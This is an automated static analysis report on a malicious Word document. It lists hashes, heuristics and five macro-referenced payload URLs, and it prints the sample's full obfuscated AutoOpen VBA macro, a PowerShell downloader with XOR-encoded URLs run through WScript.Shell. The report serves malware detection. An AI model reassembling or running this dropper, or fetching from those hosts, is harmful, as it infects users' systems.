Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 34eca167aec42e0b…

MALICIOUS

Office (OLE)

Size: 238.2 KB
Created: 2018-07-03 20:11:00
Authoring application: Microsoft Office Word
First seen: 2018-07-14
MD5: cc5f68ba2cab08d65f56d98af077f815
SHA-1: ebeb6f500de41d7269c3c826b603b9bb6629d069
SHA-256: 34eca167aec42e0bc278eda3e912a07f7d30880d54c450b601b5c08c3d182955
Risk Score: 290

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1203 Exploitation for Client Execution

The sample contains a VBA macro with an AutoOpen subroutine, which is a common technique for executing malicious code upon opening a document. The macro utilizes WScript.Shell and CreateObject, indicating an intent to execute arbitrary commands, likely to download and run a second-stage payload. The presence of 'powershell' in the script suggests it may be used to launch PowerShell commands.

Heuristics (10)

  • VBA macros detected medium 5 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
       MiahWM = qTPnr / wFQaav + (87921 * ZRjGIf * 52423 * 46874 - (66540 / jfZUo / fOiRUa - 89723 * (94297 / owLfXI)))
    MbJZQOHjqc = lzjcdjZal + CreateObject("Wscript.shell").Run(SSavX + Chr(vbKeyP) + rvwOXLPzZWJ + Chr(vbKeyO) + wfXoZWAKVpQ + orzsYzMTq, 472733228 - 472733228)
       WsIEW = ZZRGl / DnRRfh + (58820 * ABYZSD * 73432 * 2329 - (95085 / jrarA / FJTImd - 71491 * (31934 / VdPiU)))
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
       MiahWM = qTPnr / wFQaav + (87921 * ZRjGIf * 52423 * 46874 - (66540 / jfZUo / fOiRUa - 89723 * (94297 / owLfXI)))
    MbJZQOHjqc = lzjcdjZal + CreateObject("Wscript.shell").Run(SSavX + Chr(vbKeyP) + rvwOXLPzZWJ + Chr(vbKeyO) + wfXoZWAKVpQ + orzsYzMTq, 472733228 - 472733228)
       WsIEW = ZZRGl / DnRRfh + (58820 * ABYZSD * 73432 * 2329 - (95085 / jrarA / FJTImd - 71491 * (31934 / VdPiU)))
  • Payload URL decoded from an encoded PowerShell loader (5 URLs) high OLE_VBA_ENCODED_PS_DROPPER_URL
    A VBA macro assembles (from literals scattered across helper functions) a WScript.Shell command that runs a PowerShell stage-2 loader whose download URL is hidden in a numeric char-code array — decoded at runtime by [char]($_ -bxor k) (or +k / -k) after splitting on obfuscated delimiters. The decoded hosts (often an @-separated fallback list dropped to %TEMP% and executed) are the next-stage payload URLs, never contiguous on disk; surfaced as IOCs. Self-validating: only a transform yielding a valid host URL is reported.
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Attribute VB_Name = "XwdVbDfBXDFjfI"
    Sub AutoOpen()
    On Error Resume Next
  • Reference to Windows Script Host high SC_STR_WSCRIPT
    Reference to Windows Script Host
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URLs:
    • http://www.fraisedolfi.com/AZjoB6/ (Referenced by macro)
    • http://www.dslabc.org/1GOh0/ (Referenced by macro)
    • http://www.cian.ciancenter.org/images/CKPZW/ (Referenced by macro)
    • http://coreteam.casperon.com/giXotny/ (Referenced by macro)
    • http://www.athlete-psychology.com/Nl61/ (Referenced by macro)
    • http://schemas.openxmlformats.org/drawingml/2006/main (In document text (OLE body))

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 17979 bytes
SHA-256: aba2ba145f64789bd2e540ac83eabc4020df53d8e2e1cede65b380f717c7eee8
Detection
ClamAV: No threats found
Obfuscation or payload: likely
366 of 607 identifiers look randomly generated (e.g. 'XwdVbDfBXDFjfI') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "zqvAMaDK"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "XwdVbDfBXDFjfI"
Sub AutoOpen()
On Error Resume Next
   GmvkaQ = (48787 - SFIFY + wZrAEN + MjQuNN - (91216 * cNRZtN / 73025 * swbOf))
   iUYwA = (90715 - ifprMw + toJKm + YJcXr - (76209 * YwOui / 98538 * JRasl))
   SAjmww = (52397 - skCqV + clsjK + OVsmwo - (73289 * rUaZSd / 42264 * MtSPLO))
   tGpFE = (8570 - aanYwu + fpNDd + qrrjf - (64440 * LzDdw / 30115 * pJFHJ))
   oYGpTN = (77859 - EWiFRi + ZRGPru + qifuw - (28064 * Qlhzl / 55876 * XHjNI))
   wUEOGq = (77063 - vhmzob + SbNfW + SdizA - (51830 * AiqISu / 58363 * GLbzY))
   NBmdAv = (37252 - hCjYkJ + BPJaW + YaWKZi - (77089 * VkFtm / 16890 * EOfjOb))
   aUZMd = (99659 - jtVih + XicKZQ + jnkBH - (62720 * nCJZC / 67220 * rVESRw))
HdEsGCPBSK (ZBHfF + XviVmq + hNELiADf + WwifhnI)
   asfoV = (76609 - jAhbP + HkHVd + ElXIAA - (91867 * iNstSp / 958 * iZJGZN))
   HMTFA = (39564 - mfNUw + BlUTRM + JWEzcM - (31800 * OXMUC / 10887 * YbZwW))
   fWPzP = (8268 - WvzGw + UmjYEw + Wikvfw - (83789 * MYsIUV / 8121 * UBscv))
   OplEhw = (74457 - GwKSo + jinZL + SHnIZ - (39939 * FhMWO / 80947 * ITPwOd))
End Sub

Function ZBHfF()
On Error Resume Next
lDjUTt = (uSJXl + kOJiT / 41526 / 39703 - (DOzXO + bnHFY / JUhsDb + bHXQN))
   OjQttH = (qziGNb + VsokG / 91813 / 3016 - (mzkWVv + lZYuF / BpZkih + QwqiwV))
   jCCpIL = (ASiphw + ivGLD / 97265 / 73022 - (QjQirI + Mfzlah / Ywzuv + rmsLGW))
   acZFXc = (DwHOwZ + HTucwJ / 6271 / 69866 - (qwJAMi + Tiqdd / hwsZn + irRaO))
lkvrFrocRr = "wershell " + "      " + "     " + "      & " + Chr(40) + Chr(40) + "vARI" + "aBlE " + "'*MDR" + "*'" + Chr(41) + ".N" + "aME[3," + "11,2]-jO" + "IN''" + Chr(41) + " " + Chr(40) + " " + "-JOi"
BQUGPb = (wpBsri + UoKJU / 73004 / 55735 - (OtiSdj + cPbOOd / zbaIqw + swzIA))
   kjAPkz = (JsADM + qIhTF / 97992 / 85838 - (uiHYGi + Uiqjav / topmV + DSTjK))
   OIJLYO = (Bbcwz + FNmQc / 29549 / 83824 - (pjiMvi + WwjKd / cUFPqA + cXziK))
   jAMNPK = (mVYdTT + GCsvW / 44028 / 36656 - (HLJCm + doFXUb / LTkWP + ZCZVac))
srSfhlXNO = "N" + Chr(40) + " " + Chr(40) + " 26" + ", 79," + " 109 ," + "88 ," + " 3,80" + " , 91," + " 73,19 " + ", 81," + " 92 ,84," + " 91 ,93" + " ,74" + ",30 , 112"
EwGIR = (RChiSX + BrUWsI / 61405 / 25735 - (hHJoo + EYaIiw / dquUi + FkvPpS))
   zsDsrZ = (RZiii + kHoWw / 42230 / 97815 - (PNkUwY + zClZw / RZhMK + Uaqncm))
   dGTuTG = (lOzwdC + zJDJpt / 62384 / 26862 - (cYazIi + sUVIAw / fobLj + rwqjt))
   tLGfVt = (AZYaz + kWffwm / 38017 / 26858 - (tjBmOo + RkEBH / rPRLRU + DviPMQ))
GiaWkV = " , 91,7" + "4 ,16 ,1" + "05 ," + "91 ,9" + "2, 125 " + ",82,87" + " , 91," + " 80 ,74 ," + "5 ,26,112"
HFUiDT = (RCmFQH + zEjhE / 16194 / 84118 - (mDpvrr + nJEQd / hhwlu + dzdHlH))
   jjmkR = (lGJWTj + qCQrKp / 99972 / 4160 - (ujTKJm + cpObu / QMBOz + zrlbD))
   IuKDX = (pSSRpH + COPdAA / 58016 / 45117 - (WivJb + pJwEo / jHcFh + njOQI))
   arFAY = (PcqWt + iCcHi / 14237 / 89288 - (wDXVNi + zljhtF / IvnTz + kVOJu))
TYcaddAz = ", 92" + " ,86,3" + " ,25" + ", 86 ," + " 74,7" + "4,78 ,4, "
DOZHFS = (HzfjiF + GCVkn / 17175 / 2064 - (bIioHC + pjnOSa / ihUDs + Bwuzs))
   BMGFv = (KKKJw + mFmMmR / 7289 / 81069 - (VcXAi + HoaWn / zdihwK + HhmpJ))
   uELCBA = (PmQcRL + YIwvUm / 82175 / 7176 - (nPjQh + cNfvOI / djmOmL + SFDsz))
   SiPjzG = (dAqXcI + TbdJU / 70760 / 37179 - (TGnYT + qnDGZR / zwFJqT + Tsjzz))
dvJPMZkJpiX = "17 , 17, " + "73,73 " + ", 73, 1" + "6,88, 7" + "6,95 , 87" + ", 77 " + ",91 ," + "90 ,81 " + ",82, 88 " + ", 87 " + ", 16 ,93,"
JRSsM = (wYaMCJ + wpQAzu / 46651 / 44771 - (OziRaF + QTzvBs / DzPkB + MObmC))
   PIivP = (OmqYG + Djobb / 35732 / 24043 - (iovflR + YWpbM / fmadwB + ioXcip))
   pXXioR = (NCUNuA + dJsFNw / 11770 / 64931 - (DiJWP + AWsPmQ / toIiJ + EjjUkL))
   tCziGC = (kXnSjw + JCwVzj / 90007 / 59333 - (JGzfn + iLrQm / aOApLS + GtTinh))
wIOGjWzPD = " 81, 83" + ", 17,12" + "7 ,100," + " 84 ," + "81 ,12" + "4,8,1" + "7 , 12"
ZJYAqG = (nMTNUb + FHrMhD / 83426 / 90276 - (CJcAL + YiKmT / CtzPS + DsFpFm))
   ClOoW = (XmRZqS + iiAiF / 68097 / 82684 - (YzBVIR + qMSwFZ / rFYDZO + Madrwi))
   HTmiRa = (iwWrNG + RooDh / 14750 / 57561 - (NtwPH + CEMDpA / DlzsM + nDXGCL))
   CVVYFh = (LUwiu + cCwVfN / 49926 / 13225 - (Dwinb + cTNZLl / iATJFI + Zrikh))
EEHXQXsuiK = "6, 86" + ", 74" + " ,74,78" + " , 4 " + ", 17, 17," + "73,73, 7" + "3 ,16 ,90" + " , 77" + " ,82 , 95"
zthoi = (EqjDfK + dwGrD / 15661 / 54808 - (BQolW + aRitjj / bWjVs + XwulvJ))
   tlMJOS = (FOXAbb + GfGPF / 74697 / 95696 - (vcGiIN + QRJXTb / ipbUQz + iwMwb))
   VQXGJq = (kwctCI + dZEJwi / 15544 / 5408 - (XWKhFX + fsbWd / tXjth + cupSk))
   mDQmYf = (EFshB + wbuJn / 45636 / 11940 - (OCpKU + qwqnu / dBwoa + KfzztR))
KlsXvv = ",92," + " 93, 1" + "6,81 , 76" + ", 89 ," + " 17, 15" + " , 121, 1" + "13 , 86" + " ,14,17," + " 126 , 86"
ZBHfF = lkvrFrocRr + srSfhlXNO + GiaWkV + TYcaddAz + dvJPMZkJpiX + wIOGjWzPD + EEHXQXsuiK + KlsXvv
   WTOaG = (cFAIE + NqJiEP / 22973 / 57820 - (kBYaV + UzATsL / kmiLn + pEWhiL))
   kzorw = (aqIBw + IrHSjZ / 14041 / 65635 - (btHiH + wmtpS / XqisL + mkKHBw))
   kdGFsp = (pmRpA + NIHzoL / 41134 / 95109 - (Wwtcj + UNUtPW / rqvbD + awUsKB))
   tWpbzf = (SoAkzI + MswAam / 32584 / 36109 - (jaCwja + hDaBLB / DtwfL + tnkkn))
End Function
Function XviVmq()
On Error Resume Next
rMjZF = (BsIsC + Ntwkvw / 55327 / 93553 - (MmazU + ujDIY / ABFzK + hMUIq))
   uPFZX = (ZnQQfS + KNiVEG / 56665 / 80893 - (WwhVVM + SfkVCN / RiiHJ + wqsYwQ))
   fvtzFz = (TTJiaG + lSGMF / 69781 / 57474 - (Msslk + vkhDww / YJvaF + ElrWfs))
   hwWsT = (BiGKMQ + dUYzv / 71664 / 28404 - (QQENI + XIBDia / HYrba + Vilji))
skwWVf = ", 74" + ",74 " + ",78," + " 4,17, " + "17 ,7" + "3 ,73" + " , 73,"
acviin = (wLUMfi + GYqwjf / 84822 / 13767 - (fUtNT + zizcL / XbBcjE + vEAamn))
   OvAli = (GvWDB + ZOfsb / 26820 / 91844 - (FDaoFv + AWfHU / hGZNGU + ZiDwoc))
   KMzHw = (TWPJla + ZLqNC / 44225 / 96289 - (wpTAbH + BfuGa / Mmisf + dBLrr))
   fPGHDG = (JjBGUN + YjcbiH / 11540 / 24479 - (LlzEZ + VVNszA / dZAqBK + IoGsjj))
ATKznj = "16 ,93,87" + " , 95,8" + "0, 16 ,9" + "3 ,87 , 9" + "5,80," + "93 , 91 "
VjRQXp = (Whtnzk + bsMlBp / 64608 / 77646 - (TzTDpb + sQwRX / zmpTS + fbMBZ))
   iUjbc = (HPwLC + ALUBc / 49086 / 7325 - (dpjhr + mOCNJN / MUABJV + mdzQl))
   ntQLOw = (jozQDl + ujBXD / 35598 / 21788 - (vZviX + IQHwu / BijjC + YqRzWm))
   jLkOn = (PpjNX + HVkIUk / 29510 / 58147 - (UMYLVX + Vhkzc / svbnsW + lRzPwk))
kErHdGS = ",80,74 " + ",91," + "76 ,16 ," + " 81 ," + "76 , " + "89,17 "
jUiELr = (bEJml + ioiwB / 41594 / 35009 - (FEPoY + MiFwZM / uAtAsG + RwBAO))
   zSsJDc = (IGBEU + MGPBnF / 59242 / 27418 - (NiXSV + UcFDwc / BLmzho + uIlwF))
   FNPLkc = (HiQSQm + AzzMM / 47525 / 22760 - (okvIPC + IDPaw / wOtMwZ + QkakFF))
   MTwZow = (bSzrP + YYYYqS / 18333 / 39600 - (MzUUD + UDvDJA / AKqSA + qjksRW))
lZMjvUSoOn = ", 87 , 8" + "3 , 95" + ", 89, 91," + "77, 17,1" + "25,117 ," + " 110 ," + " 100"
FutYCP = (LirIi + vpLti / 71059 / 32872 - (ojwRo + omkWct / VKLXb + BEDRiv))
   phuWXu = (pMksn + qquVU / 9115 / 47737 - (zYLwb + Fwizb / iJrdh + QlTawS))
   raZas = (BDRNu + NhkYt / 41448 / 62496 - (BZfAVG + PTkOQ / jqOMJ + QsTEwR))
   Uzonp = (RZiPb + kGWND / 80436 / 78080 - (CjFAQ + YXEKLC / nhKOc + jTYjik))
GhvtNzrlit = ", 10" + "5, 17 ,12" + "6 , 86,74" + ", 74 ," + " 78, 4,1" + "7 , " + "17, 93 ,8" + "1 ,76," + " 91, 7" + "4 ,91" + " ,95,"
cFBdH = (FzqSnS + XIZus / 89820 / 88543 - (aUZza + XjdkaF / nPGou + aCUXLi))
   ErEGjY = (nihMuT + ElJYw / 22693 / 83072 - (uOnvGj + VHRCY / ALpwwl + bKkDUA))
   XTkqK = (GJBlbi + zhNMhM / 24974 / 96176 - (sTGzST + FwOUF / EwnZA + JmiiKN))
   ODRfJ = (CGGRuZ + mLlkj / 98297 / 57855 - (hrWLkr + wiVii / rzwoa + OPZZT))
VlHpELGQfpn = "83, 16 ," + "93 , 95, " + "77, 7" + "8,91 ,76 " + ", 81,80 ," + " 16," + " 93 " + ",81, 8" + "3,17 ,89" + " , 87 " + ", 102,81 "
BsQDOj = (zGsHT + tINsLl / 36723 / 99917 - (lnGsii + IjIVIq / kiIMtD + NSDDFf))
   qpRAl = (Oaihm + hrMdo / 55822 / 36344 - (vwhwH + rAhWvT / mGZWv + oMmPZc))
   tDoJzG = (cwVFv + zJwzj / 4788 / 18338 - (NDZZwP + VDpYz / PfULJk + HimHwC))
   spIpwR = (oaRkN + mHvpN / 19328 / 53093 - (dOZIMO + wOovkp / MzHPCj + djCMsL))
VupJjiOl = ", 74, 80" + ", 71,17 " + ", 126," + "86 , 74 " + ",74," + "78,4, 17," + "17, 73" + " ,73," + " 73,16" + ",95, 7"
XviVmq = skwWVf + ATKznj + kErHdGS + lZMjvUSoOn + GhvtNzrlit + VlHpELGQfpn + VupJjiOl
   vIRwlp = (uzQkcA + QIYNub / 18329 / 50487 - (nNbat + fatsO / QtVmT + vMamSj))
   pGaCAz = (pTslEw + jzKIJR / 11557 / 90561 - (KSXwz + KTXJX / JqXuhr + idkYf))
   wVEWi = (aVBdl + PzdRp / 82111 / 69553 - (bzPDba + NOfAvu / zvbEP + ojOPkc))
   ETFTDV = (fAOkC + kHsfjv / 3692 / 66232 - (ilaRRW + QRauhS / zWVdi + fFbGuH))
End Function
Function hNELiADf()
On Error Resume Next
jbDlpk = (OiwJjQ + SwbYu / 77169 / 47594 - (YZSSs + INsIa / qANoNH + NlROn))
   LibYs = (uMCalE + UmwpL / 11698 / 65698 - (hlSocZ + QaCrQb / NXXsN + mTtJO))
   BGqrUP = (ViDiTW + iFQDAJ / 65462 / 41602 - (inLmO + TGLip / CRWXtA + MziUq))
   dSulw = (ulwFBu + GMHWd / 80209 / 30582 - (Chqlb + wvlzTz / UuTuE + zbAqZ))
hhYidAZbsHJ = "4 ,86" + " ,82" + " ,91 " + ", 74,9" + "1 , " + "19 ,7" + "8 , "
VorBfZ = (Bwozu + YXtozP / 29092 / 3871 - (OCXwd + bWpriL / Cadws + SVTVqz))
   CBBPfK = (LTahG + ZWVHl / 77889 / 9519 - (GMDVpl + SicRqT / ISknK + MkXLr))
   lTvZvc = (OZoijw + aazFP / 57021 / 16696 - (SLAXj + lvhhBr / IaPvC + BcmzQv))
   rHVNN = (ujpHEJ + LJKwTp / 62733 / 2207 - (oujHIV + TASUX / Dwtzz + KNJROQ))
rtjIvfk = "77 , 71," + "93, 8" + "6,81, " + "82,81" + ", 89 , 71" + ",16 , " + "93, 81 " + ",83, " + "17 ," + " 112 , 82" + ", 8 ,1" + "5, 17, 25"
uHrUm = (Dalsl + rMmAwP / 75213 / 80679 - (IYniU + nMNhs / bvqws + oqKSJ))
   XJsYwf = (krJZv + FMaWYU / 44862 / 76466 - (YAmCop + qMKItl / BitAJ + kLSus))
   zIzNjO = (HCsli + qSGPO / 46212 / 19790 - (kPRwBE + wzIpPq / LQZcwf + IjJHuC))
   rvTPa = (dQAjY + srciG / 93567 / 60539 - (GSzkJ + tHsfM / bUrqbS + hOtHr))
zAXPcJQZ = " , 16 ," + " 109," + " 78 ,82 " + ", 87,74," + " 22 ," + "25, 1" + "26, "
zrjGM = (Ufvicc + nFDLm / 8718 / 37767 - (IOOicc + zmWqUc / kFjsA + GPwtF))
   nUbGzN = (jtzslK + TvkMX / 54557 / 50379 - (YtiXB + bpnFj / lLjVhu + aJmXnC))
   LVFbki = (pocUck + VfJMl / 14115 / 66129 - (VwfuEz + sQUZsR / uKlHmm + HlEIw))
   iawuw = (MsfRh + LJCjw / 35828 / 26690 - (GqplZ + IcjHoH / mPYMu + mUSkI))
NQbCioKhaD = "25 , 23 ," + "5 ,2" + "6 ,122,11" + "2,11" + "3, 30 , 3" + ", 30 " + ", 25 , 7"
frturG = (NJOzb + MwtZf / 58576 / 18103 - (IUTwjY + CjNEbO / UDont + IqDbz))
   TvlCR = (JqIKi + GImuVE / 43605 / 75367 - (Jhmaz + MwifAT / ASaYU + oKdThw))
   lsQDo = (pBXXa + IhPLdB / 88712 / 99603 - (tbqkr + EbSQrz / nGmcZB + Nvzcrf))
   bGlIz = (czGvq + kNvLzC / 83290 / 74092 - (kwadVv + NMalH / AmiMbr + inPvdB))
JJvOPV = " , 9,9,25" + " ,5 , " + "26, 111 " + ", 12" + "3 , 12" + "0,3 , 26 "
STCCA = (tpfrrz + wGSMM / 40434 / 53269 - (XJkzqa + lnqFEE / iwRLHF + hKRqA))
   nqqtt = (RjYMa + jLsnLa / 69209 / 87262 - (vzsZv + wTMrwJ / BInUz + HiFtn))
   CpWtY = (pvJSC + IRErA / 72535 / 86534 - (VcWuA + WLpzT / qZZvQ + hsPjUd))
   pzMCh = (ArRZTw + lZEHj / 95765 / 54203 - (JZAbsN + wdOtMZ / dFOJC + vpMJdi))
vjdcJz = ",91 ,80 " + ", 72 , 4 " + ",74 ,91" + ", 83 , " + "78 ," + " 21,25 ," + " 98 , 25"
PSEjB = (LYuDUr + pScCb / 51535 / 16339 - (wYbWMn + AVtUjz / wjMfv + JEKuEw))
   FWClaL = (WhQvHO + bwlqS / 51971 / 94018 - (zHiGTL + Ontjnz / wNOvOJ + wmolj))
   wTkNK = (TRucJo + jYZJz / 16172 / 36316 - (Wtpwi + jtOhS / Tdjkj + IfzBG))
   BznPp = (fzlfa + csLqd / 12131 / 18415 - (tTisIb + EAzoH / fwNivz + nMEuzc))
ksidcIFQq = " , 21," + "26 ,122 ," + " 112 ," + "113 ,21, " + "25 ,16 ,9" + "1 ,70 , 9" + "1 ,25" + ", 5, 88," + "81 ," + "76 , 91"
Zqhbw = (vSfEk + JSBEt / 60629 / 91219 - (HpKtww + FNkXP / jjcar + LHTUIb))
   dDvbU = (MRIzt + XFvqWG / 76844 / 18298 - (tmlIS + TmMDl / MLzsw + aZniV))
   ijzWjI = (azjfnd + cpEvhV / 98616 / 54594 - (YdBpjm + VCSRPs / rDOjq + zznOri))
   qsDli = (uvdvb + vQjFkX / 62824 / 89965 - (YkFroc + AnZVml / mSwPN + XmXBFo))
YtKLGSNCKrO = ",95, 9" + "3 , 86,22" + ", 26 " + ", 84" + " ,68," + "100 " + ",30 ,87 ," + "80 ," + " 30, 2"
vfhvj = (iioSUH + iIfnPl / 18545 / 35993 - (RsiIfu + PFjQPi / VSmvZ + fimQI))
   lURCI = (iCiIRY + OwCsU / 96064 / 37737 - (TAKbap + OSWIF / zGYkp + lVNTt))
   uGhwh = (tBOpRY + nBYMnr / 23437 / 6901 - (KVcqkv + mFNzY / bhHzj + dvjBO))
   PZaGh = (zasfS + oJOcVL / 67319 / 70242 - (MrSoIs + bqmzBU / vbLkI + jwYwjC))
rZBiKwj = "6 , 112, " + "92 ," + "86, 23" + ",69," + " 74 ,76" + ",71 " + ",69,26" + ", 79 ,1"
hNELiADf = hhYidAZbsHJ + rtjIvfk + zAXPcJQZ + NQbCioKhaD + JJvOPV + vjdcJz + ksidcIFQq + YtKLGSNCKrO + rZBiKwj
   wsLMc = (HjBMMT + UcOBtt / 60216 / 72271 - (uJlWhm + tmwiqY / WhtmY + PWWNoF))
   YqTwzp = (zwPMLP + dsSsG / 710 / 215 - (iGdPV + iuVSj / RjjhWZ + BdsIu))
   mcwOPn = (wCbFz + iHZOk / 83351 / 90537 - (rUAGG + ZXmXib / LRokT + RJUGn))
   lVGSzZ = (DvwMVr + zmbjDY / 43518 / 75929 - (qFnKp + DdTOqz / HUGnD + EfVmH))
End Function
Function WwifhnI()
On Error Resume Next
ckatPG = (EhShTu + KwkkRi / 5945 / 50581 - (hDiolm + RmlYJU / NRoLD + atARS))
   FjiEC = (QjrRM + KIjIXu / 70896 / 77337 - (XQAlI + FlGjuA / itaTL + CTjzOz))
   UwOwUh = (wtpjR + RtBuh / 42630 / 39371 - (oXTdTz + MoDRV / SpCqQq + WQXlW))
   DOIzIc = (KRuIzH + whbPD / 45446 / 44841 - (XqldR + dJXNMT / aRaiv + RiQJqd))
JXqSQDjVoYs = "09 ,8" + "8 ,16, " + "122 , 8" + "1 , 7" + "3, 80, 8" + "2, 81, " + "95 ,90" + ", 120,8" + "7 ,8" + "2 ,91 ,"
lIdlt = (ZpSlu + jwiYMj / 27748 / 4454 - (BAvOEc + twnUTj / KkFzSa + QzScdj))
   PJikK = (XZzmDa + CPliIb / 26835 / 20940 - (ULzPBr + SNqqfA / jiMNJ + OaOMvh))
   CCchfO = (IhXpkw + VwaQzK / 39818 / 77134 - (mwbMl + dlbts / uKmoVF + DhHhc))
   mHZwT = (wCjbvS + hdmFl / 27197 / 94079 - (zEwEQ + NTXzhH / NRmpk + WrlNH))
HQjPLPiO = "22 , 26,8" + "4,68" + " , 100, 1" + "8 , 30, 2" + "6, 1" + "11,123, " + "120,23 ,5" + " , 10" + "9 ,7"
zcHfjr = (vikaSv + qqSsu / 41471 / 49499 - (tawdjk + iVbXs / AMFKRA + CsKGjq))
   SGwzwt = (XjSKDj + UvdWL / 42401 / 9225 - (IBRLTX + ccUlrJ / VkclZb + Xtiqrz))
   CQzwiI = (jhjDL + nzPwu / 5361 / 53280 - (iMhdVz + APpwqD / SXftk + QfWHG))
   uwrLfZ = (OvqkD + wFDlO / 83767 / 10717 - (boncc + SkZiO / aqEmZv + icwTB))
hblatM = "4 ,95" + ", 76 ,74" + " ,19 ," + "110 , 76 " + ", 81 , 9" + "3 ,91,"
SuJzS = (IdZVA + OrfFA / 5542 / 72521 - (SFYmCQ + XpLaD / daDpUQ + JOcXlw))
   jaDhN = (BldFUl + KKIRYO / 79783 / 94016 - (wiLNPm + zzUjHS / CslMZl + HSlJT))
   tYBRi = (bqMVX + CDkoOv / 92773 / 35300 - (QcPfms + EdBADG / zntrf + nNhSX))
   mCdMMd = (rXEPT + JRjRt / 12148 / 40526 - (hhrTB + GZzpa / hMnXD + TbMiNI))
vwBGlbid = " 77 ,77" + " , 30 , " + "26 , 11" + "1 , " + "123,120," + " 5 ,92 ," + " 76 ,91 ,"
NDMiX = (qvJTl + CHGai / 29071 / 15181 - (hCSoA + iPBAs / iLjdm + ltjzOO))
   CiNwiR = (oZuXY + caApdX / 55187 / 69885 - (UuKVP + hwMIQW / YhAdGw + FUBnq))
   TErOi = (mffXLl + dFtbu / 17980 / 51737 - (iqXdo + dOihn / YhNmB + NFszo))
   pZZOb = (fZdvml + ftljTW / 86647 / 92685 - (lAUDQw + CvzHYC / iOZLY + oDBIvz))
VNGZWcjT = "95, 85 " + ", 5 ,6" + "7, 9" + "3, 95" + " ,74, " + "93,86," + " 69 ,67" + ", 67" + Chr(41) + "|" + " % { [ch" + "aR] " + Chr(40) + " $" + "_-bx" + "oR " + Chr(34) + "0x"
uwYzq = (owQPml + YmLsl / 6948 / 87879 - (Vnptm + IWZEzz / fQRTmU + otdim))
   zTQfbw = (zzAKOH + uijJSj / 17946 / 22021 - (AQpKC + MpRcDt / JsUYtf + waLpL))
   GQmha = (RMZIjE + FfcqK / 73736 / 74662 - (tVuZwj + SbKGHS / rjriN + VFIhPi))
   sODfA = (EFnBo + TlqmJ / 32137 / 782 - (XhzwsG + YvVVf / zlaww + ZchQW))
STGicvuuMfC = "3e" + Chr(34) + " " + Chr(41) + "}" + Chr(41) + Chr(41) + " "
WwifhnI = JXqSQDjVoYs + HQjPLPiO + hblatM + vwBGlbid + VNGZWcjT + STGicvuuMfC
   UEnMfi = (Jlqir + jBnbBE / 85300 / 31540 - (IKsRtd + FtqhwG / icRrd + iniKDA))
   LEcGJ = (RzikS + mXuJa / 64745 / 62853 - (LhMmaH + pwasC / iNBsj + GsSqf))
   TQQmn = (jwcUN + kjfznJ / 81842 / 49703 - (IwkMOX + UbiOs / HpcEub + HCIDCs))
   YLDTw = (dNvsIb + ctwwc / 94641 / 71233 - (otzjYF + nNMKP / QGYqK + oIwqj))
End Function


Attribute VB_Name = "wmzIWLjuvVjNp"
Function HdEsGCPBSK(wfXoZWAKVpQ)
On Error Resume Next
   SmjTz = IBXQRa / OplfFE + (70801 * SizMd * 25875 * 62859 - (26189 / EiNWuO / qJcsj - 72360 * (90103 / zFjJr)))
   DLAor = uoSOb / poPZmo + (51857 * TkMIfq * 72025 * 57174 - (44219 / lNADJJ / BkILU - 45375 * (67388 / zcBZsi)))
   CdiMZ = itZwcr / QPrLij + (42474 * pADIs * 20976 * 74448 - (82931 / BAbCRm / BDLNt - 46075 * (23237 / UlifdV)))
   JzkMcb = hVwCj / cQswda + (19065 * VIcSoJ * 78708 * 12395 - (61730 / NUVqb / FJpzW - 79066 * (34452 / oRRDtf)))
   vKcwC = aouKM / ALZZPt + (45443 * wsRpL * 36384 * 72527 - (48595 / mtiGL / iizJa - 91847 * (86672 / ssGzfd)))
   qCnRt = OjaSkL / MZdQU + (89640 * QcbwW * 68222 * 27028 - (39538 / PtLwMo / hXCFA - 96201 * (82027 / pjqfO)))
   TntLA = kGWfc / nLmNHT + (52965 * pwbrU * 62722 * 76392 - (93409 / XhXWN / qTLuKk - 67981 * (75621 / QwwjPk)))
   MiahWM = qTPnr / wFQaav + (87921 * ZRjGIf * 52423 * 46874 - (66540 / jfZUo / fOiRUa - 89723 * (94297 / owLfXI)))
MbJZQOHjqc = lzjcdjZal + CreateObject("Wscript.shell").Run(SSavX + Chr(vbKeyP) + rvwOXLPzZWJ + Chr(vbKeyO) + wfXoZWAKVpQ + orzsYzMTq, 472733228 - 472733228)
   WsIEW = ZZRGl / DnRRfh + (58820 * ABYZSD * 73432 * 2329 - (95085 / jrarA / FJTImd - 71491 * (31934 / VdPiU)))
   HIaIOl = ECLqft / FtDEw + (34758 * kpBjwf * 82569 * 31753 - (98236 / YONpb / DDXsJ - 63574 * (6632 / ljwzq)))
   UwILY = snkkc / fHRin + (77480 * qrPjzH * 5971 * 29489 - (47866 / FVGwsS / aunRpv - 29161 * (49750 / uNVbNT)))
   omYEM = DVnUp / OWFmpU + (9001 * BZAwAJ * 98758 * 25648 - (79905 / zjlLRJ / NjPqR - 56323 * (41471 / jKbob)))
End Function